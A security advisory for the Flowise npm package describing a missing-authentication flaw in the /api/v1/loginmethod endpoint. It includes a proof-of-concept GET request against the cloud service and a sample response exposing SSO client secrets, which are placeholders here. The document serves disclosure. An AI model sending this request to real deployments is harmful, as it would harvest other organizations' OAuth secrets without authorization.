PT-2026-35299 · Npm · Flowise
Published
2026-04-16
·
Updated
2026-04-16
CVSS v3.1
5.3
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request
http
GET /api/v1/loginmethod?organizationId=<any organization id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/jsonResponse: The server returns 200 OK with sensitive credentials:
json
{
"providers": [
{
"id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "azure",
"config": {
"tenantID": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "google",
"config": {
"clientID": "123455",
"clientSecret": "123455"
},
"status": "enable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "auth0",
"config": {
"domain": "",
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
},
{
"id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
"organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
"name": "github",
"config": {
"clientID": "",
"clientSecret": ""
},
"status": "disable",
"createdDate": "2025-12-26T18:52:33.453Z",
"updatedDate": "2025-12-26T19:31:56.087Z",
"createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
"updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
}
],
"callbacks": [
{
"providerName": "azure",
"callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
},
{
"providerName": "google",
"callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
},
{
"providerName": "auth0",
"callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
},
{
"providerName": "github",
"callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
}
]
}Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
Fix
Cleartext Storage of Sensitive Information
Missing Authentication
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Flowise